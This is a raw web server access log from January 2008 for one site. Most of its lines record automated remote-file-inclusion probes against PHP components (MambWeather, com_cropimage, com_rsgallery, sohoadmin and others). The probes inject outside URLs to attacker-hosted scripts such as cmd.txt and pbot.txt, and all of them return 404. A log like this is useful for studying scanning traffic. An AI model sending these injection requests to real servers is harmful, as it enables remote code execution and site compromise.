85.214.29.90 - - [11/Jan/2008:19:36:59 -0800] "GET /modules/MambWeather/Savant2/Savant2_Plugin.php_options.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
85.214.29.90 - - [11/Jan/2008:19:37:00 -0800] "GET /logs/modules/MambWeather/Savant2/Savant2_Plugin.php_options.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:19:37:07 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:19:37:08 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.projectpr.com"
202.57.162.49 - - [11/Jan/2008:19:37:19 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.apnic.net/index.html? HTTP/1.0" 404 274 "-" "Mozilla/5.0" "www.projectpr.com"
65.254.58.42 - - [11/Jan/2008:19:37:20 -0800] "GET /logs/access_070712.log/modules/MambWeather/Savant2/Savant2_Plugin.php_options.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 327 "-" "libwww-perl/5.808" "www.projectpr.com"
202.57.162.49 - - [11/Jan/2008:19:37:20 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.apnic.net/index.html? HTTP/1.0" 404 269 "-" "Mozilla/5.0" "www.projectpr.com"
65.254.58.42 - - [11/Jan/2008:19:37:20 -0800] "GET /modules/MambWeather/Savant2/Savant2_Plugin.php_options.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [11/Jan/2008:19:37:20 -0800] "GET /logs/modules/MambWeather/Savant2/Savant2_Plugin.php_options.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.808" "www.projectpr.com"
85.214.29.90 - - [11/Jan/2008:19:39:05 -0800] "GET /logs/access_070812.log/modules/MambWeather/Savant2/Savant2_Plugin.php_options.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.67.237.143 - - [11/Jan/2008:19:39:19 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.67.237.143 - - [11/Jan/2008:19:39:20 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.67.237.143 - - [11/Jan/2008:19:39:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [11/Jan/2008:19:39:27 -0800] "GET /logs/access_070812.log/modules/MambWeather/Savant2/Savant2_Plugin.php_options.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:19:42:27 -0800] "GET /logs/access_070812.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:19:42:27 -0800] "GET //cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:19:42:27 -0800] "GET /logs//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.67.237.143 - - [11/Jan/2008:19:42:28 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.808" "www.projectpr.com"
217.67.237.143 - - [11/Jan/2008:19:42:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.808" "www.projectpr.com"
217.67.237.143 - - [11/Jan/2008:19:42:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.808" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:19:42:35 -0800] "GET /logs/access_070812.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:19:42:35 -0800] "GET //cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:19:42:35 -0800] "GET /logs//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.80.193.52 - - [11/Jan/2008:19:44:56 -0800] "GET / HTTP/1.1" 200 9521 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312465)" "www.projectpr.com"
74.53.58.15 - - [11/Jan/2008:19:49:26 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
83.220.144.130 - - [11/Jan/2008:19:50:22 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:19:50:30 -0800] "GET /logs/access_070912.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
81.169.157.91 - - [11/Jan/2008:19:52:11 -0800] "GET /logs/access_070912.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [11/Jan/2008:19:52:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [11/Jan/2008:19:52:12 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.69" "www.projectpr.com"
74.200.202.37 - - [11/Jan/2008:19:53:53 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.58.15 - - [11/Jan/2008:19:55:16 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.58.15 - - [11/Jan/2008:19:55:16 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.251.173.55 - - [11/Jan/2008:19:55:17 -0800] "GET /logs/access_070912.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.80.123.56 - - [11/Jan/2008:19:57:12 -0800] "GET //skin/zero_vote/error.php?dir=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
67.19.3.34 - - [11/Jan/2008:19:58:07 -0800] "GET //skin/zero_vote/error.php?dir=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.73.67 - - [11/Jan/2008:19:58:17 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
83.220.144.130 - - [11/Jan/2008:19:58:33 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
83.220.144.130 - - [11/Jan/2008:19:58:33 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.200.202.37 - - [11/Jan/2008:19:58:58 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.200.202.37 - - [11/Jan/2008:19:58:58 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:20:01:11 -0800] "GET /logs/access_070812.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 346 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:20:01:12 -0800] "GET //cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 323 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:20:01:13 -0800] "GET /logs//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.53.58.15 - - [11/Jan/2008:20:05:24 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
91.121.1.47 - - [11/Jan/2008:20:08:31 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://slcdelivery.com/banners/frame.jpg?? HTTP/1.1" 404 305 "-" "libwww-perl/5.803" "www.projectpr.com"
74.200.202.37 - - [11/Jan/2008:20:08:31 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:11:29 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:11:30 -0800] "GET /skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:11:31 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:11:57 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:11:57 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:11:57 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.220.144.130 - - [11/Jan/2008:20:12:19 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.91.254.133 - - [11/Jan/2008:20:12:47 -0800] "GET /checkout.php?abs_path=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.projectpr.com"
64.91.254.133 - - [11/Jan/2008:20:13:07 -0800] "GET /logs/checkout.php?abs_path=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.projectpr.com"
91.121.1.47 - - [11/Jan/2008:20:13:20 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://slcdelivery.com/banners/frame.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.1.47 - - [11/Jan/2008:20:13:20 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://slcdelivery.com/banners/frame.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.6.8.120 - - [11/Jan/2008:20:13:40 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.8.120 - - [11/Jan/2008:20:13:43 -0800] "GET /logs/access_070812.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
67.19.3.34 - - [11/Jan/2008:20:14:12 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [11/Jan/2008:20:14:12 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:17:05 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:17:06 -0800] "GET /skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:17:07 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:17:41 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:17:41 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:17:41 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.80.123.56 - - [11/Jan/2008:20:20:19 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.80.123.56 - - [11/Jan/2008:20:20:20 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:22:01 -0800] "GET /logs/access.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:22:02 -0800] "GET //include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:22:05 -0800] "GET /logs//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:22:49 -0800] "GET /logs/access_070912.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:23:45 -0800] "GET /logs/access.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:23:46 -0800] "GET //include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:23:47 -0800] "GET /logs//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:20:23:53 -0800] "GET /logs/access_070912.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 346 "-" "libwww-perl/5.803" "www.projectpr.com"
196.35.158.181 - - [11/Jan/2008:20:24:23 -0800] "GET /logs/access_070912.log//include.php?path[docroot]=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.121.1.47 - - [11/Jan/2008:20:24:41 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://slcdelivery.com/banners/frame.jpg?? HTTP/1.1" 404 321 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:32:04 -0800] "GET /logs/access_070912.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 312 "-" "libwww-perl/5.803" "www.projectpr.com"
209.59.195.106 - - [11/Jan/2008:20:35:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:37:59 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:42:29 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:42:29 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:42:30 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:45:15 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:20:45:15 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.111.176.90 - - [11/Jan/2008:20:45:24 -0800] "GET //cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://216.126.65.86/store/id? HTTP/1.1" 404 323 "-" "libwww-perl/5.805" "www.projectpr.com"
209.59.195.106 - - [11/Jan/2008:20:55:50 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.59.195.106 - - [11/Jan/2008:20:55:50 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.808" "www.projectpr.com"
89.111.176.90 - - [11/Jan/2008:20:56:18 -0800] "GET /logs/access_070812.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.111.176.90 - - [11/Jan/2008:20:56:19 -0800] "GET /logs//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.111.176.90 - - [11/Jan/2008:20:57:42 -0800] "GET //cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.8.120 - - [11/Jan/2008:20:59:26 -0800] "GET /logs/access_070912.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
89.111.176.90 - - [11/Jan/2008:21:05:35 -0800] "GET /logs/access_070812.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.111.176.90 - - [11/Jan/2008:21:05:35 -0800] "GET /logs//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
204.9.78.190 - - [11/Jan/2008:21:07:29 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
204.9.78.190 - - [11/Jan/2008:21:10:52 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
204.9.78.190 - - [11/Jan/2008:21:10:52 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.111.176.90 - - [11/Jan/2008:21:11:57 -0800] "GET /logs/access_070912.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://216.126.65.86/store/id? HTTP/1.1" 404 346 "-" "libwww-perl/5.805" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:13:43 -0800] "GET //cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:13:43 -0800] "GET //cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 323 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:13:44 -0800] "GET //cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
